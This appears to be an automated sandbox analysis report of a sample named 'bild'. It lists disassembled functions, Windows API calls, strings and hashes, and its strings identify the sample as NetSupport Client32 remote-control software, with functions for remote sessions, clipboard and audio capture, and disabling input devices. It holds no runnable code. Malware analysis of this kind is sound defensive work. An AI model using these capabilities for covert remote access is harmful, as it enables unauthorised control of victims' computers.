Similarity

API ID:
String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
API String ID: 0-293745777
Opcode ID: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
Instruction ID: daee403c678e01c213c7a1d72acf829bd0b7d6ab4ed81c5860d9e9f482a37d6e
Opcode Fuzzy Hash: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
Instruction Fuzzy Hash: 7AA1F535B102069FD710DFA5DC91FAAF3A4EFD834AF10459DEA4A9B380DA31B940CB91

Function 11093080 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(11147750), ref: 11093089

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110930B9
FindWindowA.USER32(NSMClassList,00000000), ref: 110930CA
SetForegroundWindow.USER32(00000000), ref: 110930D1

Part of subcall function 110914F0: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091552

Part of subcall function 11092FF0: GetClassInfoA.USER32(110930EC,NSMClassList,?), ref: 11093004

Part of subcall function 11091620: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 1109166D
Part of subcall function 11091620: UpdateWindow.USER32(?), ref: 110916BF

CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093111

Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110916EA
Part of subcall function 110916D0: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093120,?,00000000,?,00000000), ref: 11091717
Part of subcall function 110916D0: TranslateMessage.USER32(?), ref: 11091721
Part of subcall function 110916D0: DispatchMessageA.USER32(?), ref: 1109172B
Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1109173B

CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093135

Part of subcall function 11091590: GlobalDeleteAtom.KERNEL32(00000000), ref: 110915CE

Strings

NSMFindClassEvent, xrefs: 110930AD, 11093106
NSMClassList, xrefs: 110930C5

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
String ID: NSMClassList$NSMFindClassEvent
API String ID: 1622498684-2883797795
Opcode ID: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
Instruction ID: dc520b378aeee27ae2973ce0394f0415fb857a8947d0a09b3e9437a491b5cd63
Opcode Fuzzy Hash: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
Instruction Fuzzy Hash: 7111E976F4821D77EB00A6B51C69F6FBADC5B847A8F001024F92DD62C4EF14E401A7A6

Function 1115B1D0 Relevance: 13.6, APIs: 9, Instructions: 125windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12

_memset.LIBCMT ref: 1115B266
SendMessageA.USER32(?,000005FF,00000000,00000000), ref: 1115B29C
ShowWindow.USER32(?,00000006,?,?,?,?,?), ref: 1115B2AC
GetDesktopWindow.USER32 ref: 1115B309
TileWindows.USER32(00000000,?,?,?,?), ref: 1115B310

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Window_memset$DesktopMessageSendShowTileVersionWindows
String ID:
API String ID: 2935161463-0
Opcode ID: aa24af5320f1a66e50dc0ce942e36c3092fc734b39a40bfe4571f2283a562896
Instruction ID: b14402a4e76bbdd80eea2f1b3df88d79255beb3666519cd349b4ccd6d2fbdf9c
Opcode Fuzzy Hash: aa24af5320f1a66e50dc0ce942e36c3092fc734b39a40bfe4571f2283a562896
Instruction Fuzzy Hash: 39410271A00205ABEB809F64CDC5B6EF7B9FF46354F104065E925EB280DB70E940CFA9

Function 11063160 Relevance: 149.1, APIs: 42, Strings: 43, Instructions: 353libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(11074E10,ctl_version), ref: 11063177
GetProcAddress.KERNEL32(11074E10,ctl_installed), ref: 1106319C
GetProcAddress.KERNEL32(11074E10,ctl_netname), ref: 110631C2
GetProcAddress.KERNEL32(11074E10,ctl_remotename), ref: 110631E8
GetProcAddress.KERNEL32(11074E10,ctl_bridgename), ref: 1106320E
GetProcAddress.KERNEL32(11074E10,ctl_networks), ref: 11063234
GetProcAddress.KERNEL32(11074E10,ctl_pingnet), ref: 1106325A
GetProcAddress.KERNEL32(11074E10,ctl_open), ref: 11063280
GetProcAddress.KERNEL32(11074E10,ctl_close), ref: 110632A6
GetProcAddress.KERNEL32(11074E10,ctl_getsession), ref: 110632F2
GetProcAddress.KERNEL32(11074E10,ctl_call), ref: 11063318
GetProcAddress.KERNEL32(11074E10,ctl_hangup), ref: 1106333E
GetProcAddress.KERNEL32(11074E10,ctl_nsessions), ref: 11063364
GetProcAddress.KERNEL32(11074E10,ctl_connected), ref: 1106338A
GetProcAddress.KERNEL32(11074E10,ctl_send), ref: 110633B0
GetProcAddress.KERNEL32(11074E10,ctl_sendex), ref: 110633D6
GetProcAddress.KERNEL32(11074E10,ctl_sendif), ref: 110633EB
GetProcAddress.KERNEL32(11074E10,ctl_sendto), ref: 11063411
GetProcAddress.KERNEL32(11074E10,ctl_subset), ref: 1106341C
GetProcAddress.KERNEL32(11074E10,ctl_helpreq), ref: 11063468
GetProcAddress.KERNEL32(11074E10,ctl_maxpacket), ref: 1106348E
GetProcAddress.KERNEL32(11074E10,ctl_openremote), ref: 110634B4
GetProcAddress.KERNEL32(11074E10,ctl_closeremote), ref: 110634DA
GetProcAddress.KERNEL32(11074E10,ctl_callremote), ref: 11063500
GetProcAddress.KERNEL32(11074E10,ctl_pause), ref: 11063442

Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584

GetProcAddress.KERNEL32(11074E10,ctl_findslaves), ref: 110632CC

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

GetProcAddress.KERNEL32(11074E10,ctl_myaddr), ref: 11063526
GetProcAddress.KERNEL32(11074E10,ctl_loadbridge), ref: 11063531
GetProcAddress.KERNEL32(11074E10,ctl_getfailedreason), ref: 1106353C
GetProcAddress.KERNEL32(11074E10,ctl_escape), ref: 11063547
GetProcAddress.KERNEL32(11074E10,ctl_publishservice), ref: 11063552
GetProcAddress.KERNEL32(11074E10,ctl_publishserviceex), ref: 1106355D
GetProcAddress.KERNEL32(11074E10,ctl_findslavesex), ref: 1106356B
GetProcAddress.KERNEL32(11074E10,ctl_broadcastdata), ref: 11063576
GetProcAddress.KERNEL32(11074E10,ctl_sendname), ref: 11063584
GetProcAddress.KERNEL32(11074E10,ctl_getlocalipaddressinuse), ref: 11063592
GetProcAddress.KERNEL32(11074E10,ctl_clientpinrequest), ref: 110635A0
GetProcAddress.KERNEL32(11074E10,ctl_controlsendpin), ref: 110635AE
GetProcAddress.KERNEL32(11074E10,ctl_controlpinrequest), ref: 110635BC
GetProcAddress.KERNEL32(11074E10,ctl_clearpin), ref: 110635CA
GetProcAddress.KERNEL32(11074E10,ctl_getcodepage), ref: 110635D8
GetProcAddress.KERNEL32(11074E10,ctl_getconnectivityinfo), ref: 110635E6

Strings

ctl_callremote, xrefs: 110634FA, 11063513
ctl_connected, xrefs: 11063384, 1106339D
ctl_findslaves, xrefs: 110632C6, 110632DF
ctl_escape, xrefs: 1106353E
ctl_helpreq, xrefs: 11063462, 1106347B
ctl_closeremote, xrefs: 110634D4, 110634ED
ctl_getlocalipaddressinuse, xrefs: 11063586
ctl_loadbridge, xrefs: 11063528
ctl_open, xrefs: 1106327A, 11063293
ctl_send, xrefs: 110633AA, 110633C3
ctl_bridgename, xrefs: 11063208, 11063221
ctl_installed, xrefs: 11063196, 110631AF
ctl_call, xrefs: 11063312, 1106332B
ctl_getsession, xrefs: 110632EC, 11063305
ctl_getfailedreason, xrefs: 11063533
ctl_sendname, xrefs: 11063578
ctl_myaddr, xrefs: 11063520
ctl_controlpinrequest, xrefs: 110635B0
ctl_clientpinrequest, xrefs: 11063594
ctl_nsessions, xrefs: 1106335E, 11063377
ctl_hangup, xrefs: 11063338, 11063351
ctl_getconnectivityinfo, xrefs: 110635DA
ctl_maxpacket, xrefs: 11063488, 110634A1
ctl_controlsendpin, xrefs: 110635A2
ctl_pingnet, xrefs: 11063254, 1106326D
ctl_publishserviceex, xrefs: 11063554
ctl_pause, xrefs: 1106343C, 11063455
ctl_sendex, xrefs: 110633D0
ctl_getcodepage, xrefs: 110635CC
ctl_close, xrefs: 110632A0, 110632B9
ctl_openremote, xrefs: 110634AE, 110634C7
ctl_remotename, xrefs: 110631E2, 110631FB
..\ctl32\Connect.cpp, xrefs: 11063184, 110631AA, 110631D0, 110631F6, 1106321C, 11063242, 11063268, 1106328E, 110632B4, 110632DA, 11063300, 11063326, 1106334C, 11063372, 11063398, 110633BE, 110633F9, 1106342A, 11063450, 11063476, 1106349C, 110634C2, 110634E8, 1106350E
ctl_version, xrefs: 1106316F, 11063189
ctl_sendto, xrefs: 1106340B
ctl_sendif, xrefs: 110633E5, 110633FE
ctl_publishservice, xrefs: 11063549
ctl_netname, xrefs: 110631BC, 110631D5
ctl_findslavesex, xrefs: 1106355F
ctl_networks, xrefs: 1106322E, 11063247
ctl_subset, xrefs: 11063413, 1106342F
ctl_broadcastdata, xrefs: 1106356D
ctl_clearpin, xrefs: 110635BE

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: AddressProc$ExitProcess$ErrorLastMessage_strrchrwsprintf
String ID: ..\ctl32\Connect.cpp$ctl_bridgename$ctl_broadcastdata$ctl_call$ctl_callremote$ctl_clearpin$ctl_clientpinrequest$ctl_close$ctl_closeremote$ctl_connected$ctl_controlpinrequest$ctl_controlsendpin$ctl_escape$ctl_findslaves$ctl_findslavesex$ctl_getcodepage$ctl_getconnectivityinfo$ctl_getfailedreason$ctl_getlocalipaddressinuse$ctl_getsession$ctl_hangup$ctl_helpreq$ctl_installed$ctl_loadbridge$ctl_maxpacket$ctl_myaddr$ctl_netname$ctl_networks$ctl_nsessions$ctl_open$ctl_openremote$ctl_pause$ctl_pingnet$ctl_publishservice$ctl_publishserviceex$ctl_remotename$ctl_send$ctl_sendex$ctl_sendif$ctl_sendname$ctl_sendto$ctl_subset$ctl_version
API String ID: 1096595926-1306570422
Opcode ID: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
Instruction ID: 5f24de0e2360826035fa82522da9b4a10218173402b610a7b1cd1951dc97c3b7
Opcode Fuzzy Hash: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
Instruction Fuzzy Hash: 96A15DBCF447927AD312AFB76C91FABFEE86F615D8B81042AF449E5901FA60F000C556

Function 11005360 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1105DE40: __itow.LIBCMT ref: 1105DE65

GetObjectA.GDI32(?,0000003C,?), ref: 11005435

Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2

wsprintfA.USER32 ref: 1100548D
DeleteObject.GDI32(?), ref: 110054E2
DeleteObject.GDI32(?), ref: 110054EB
SelectObject.GDI32(?,?), ref: 11005502
DeleteObject.GDI32(?), ref: 11005508
DeleteDC.GDI32(?), ref: 1100550E
SelectObject.GDI32(?,?), ref: 1100551F
DeleteObject.GDI32(?), ref: 11005528
DeleteDC.GDI32(?), ref: 1100552E
DeleteObject.GDI32(?), ref: 1100553F
DeleteObject.GDI32(?), ref: 1100556A
DeleteObject.GDI32(?), ref: 11005588
DeleteObject.GDI32(?), ref: 11005591
ShowWindow.USER32(?,00000009), ref: 110055BF
PostQuitMessage.USER32(00000000), ref: 110055C7

Strings

Font, xrefs: 1100549F
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s, xrefs: 11005487
Tool, xrefs: 11005383
PenWidth, xrefs: 110053DD
PenColour, xrefs: 110053A1
PenStyle, xrefs: 110053BF
FillStyle, xrefs: 11005419
FillColour, xrefs: 110053FB
Annotate, xrefs: 11005388, 110053A6, 110053C4, 110053E2, 11005400, 1100541E, 110054A4

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
API String ID: 2789700732-770455996
Opcode ID: 545b59c5a20981a964d2566c076ce67725319314088b52aa60ee8a5e99a3c4b0
Instruction ID: d9229358f4933b228272336fa2bf33a0883a331572b372d30b0232039735f129
Opcode Fuzzy Hash: 545b59c5a20981a964d2566c076ce67725319314088b52aa60ee8a5e99a3c4b0
Instruction Fuzzy Hash: 5C816975A00609AFD728DBB5C990EABF7F9BF8C304F00451DE6A697680DA75F801CB60

Function 110FF3C0 Relevance: 42.2, APIs: 8, Strings: 16, Instructions: 207synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

Part of subcall function 110ED1F0: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105E76C,?,00000000,?,00000000,75A78400,?,?,1105E76C,80000001), ref: 110ED21B

GetTickCount.KERNEL32 ref: 110FF4DB
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 110FF4E8
CloseHandle.KERNEL32(00000000), ref: 110FF4F5
GetTickCount.KERNEL32 ref: 110FF4FB
wsprintfA.USER32 ref: 110FF5BE
_memset.LIBCMT ref: 110FF5CF

Strings

DisableHidDevices(%d), xrefs: 110FF429
%s HID*, xrefs: 110FF626
Trace, xrefs: 110FF51E
D, xrefs: 110FF601
Error creating process %s, xrefs: 110FF679
"%s" %s %s HID*, xrefs: 110FF5B8
_debug, xrefs: 110FF523, 110FF545
Software\NetSupport Ltd\Client32, xrefs: 110FF44A
nsdevcon.exe, xrefs: 110FF566, 110FF56D, 110FF593
Waited %d ms for last devcon, xrefs: 110FF507
Error %d opening key, xrefs: 110FF46B
nsdevcon64.exe, xrefs: 110FF55F, 110FF678
DisabledHID, xrefs: 110FF47F, 110FF660, 110FF66C
DisableHIDCode, xrefs: 110FF3FB
TraceFile, xrefs: 110FF540
Client, xrefs: 110FF400

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CountTick$CloseCreateHandleObjectSingleWait__wcstoi64_memsetwsprintf
String ID: "%s" %s %s HID*$%s HID*$Client$D$DisableHIDCode$DisableHidDevices(%d)$DisabledHID$Error %d opening key$Error creating process %s$Software\NetSupport Ltd\Client32$Trace$TraceFile$Waited %d ms for last devcon$_debug$nsdevcon.exe$nsdevcon64.exe
API String ID: 137837830-2801557662
Opcode ID: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
Instruction ID: a11abc6b97969388e485db2e6a8e88b8a5e3b39e7edf5af597a12920a36432c8
Opcode Fuzzy Hash: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
Instruction Fuzzy Hash: 9471EC75E4421ABBEB10DBA1DC89FEEF774EB08708F10419DED14A6181EB306944CBA6

Function 110EB120 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

wsprintfA.USER32 ref: 110EB1B8
GetTickCount.KERNEL32 ref: 110EB212
SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
GetTickCount.KERNEL32 ref: 110EB22E
SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC

Strings

Warning: SendMessage to Runplugin took %d ms (possibly unresponsive), xrefs: 110EB23A
%s, xrefs: 110EB1E3
INIT, xrefs: 110EB15C
runplugin.dmp.1, xrefs: 110EB29F
_debug, xrefs: 110EB14D
TracePlugins, xrefs: 110EB140
DATA, xrefs: 110EB166
Error. Runplugin is unresponsive, xrefs: 110EB2C2
runplugin %s (hWnd=%x,u=%d,64=%d) , xrefs: 110EB1B2

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
API String ID: 3451743168-2289091950
Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1

Function 1100B310 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON

Download Yara Rule

APIs

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

_malloc.LIBCMT ref: 1100B366

Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96

Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,F3EE1E80,?,00000000,00000000), ref: 1100AC84
Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACEE
Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD35
Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3C
Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75

EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,F3EE1E80,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
_calloc.LIBCMT ref: 1100B3E9
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E

Strings

Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
Audio, xrefs: 1100B347
\\.\NSAudioFilter, xrefs: 1100B3B0
Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
Vista new pAudioCap=%p, xrefs: 1100B4D3
InitCaptureSounds NT6, xrefs: 1100B48E
DisableSounds, xrefs: 1100B342
Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
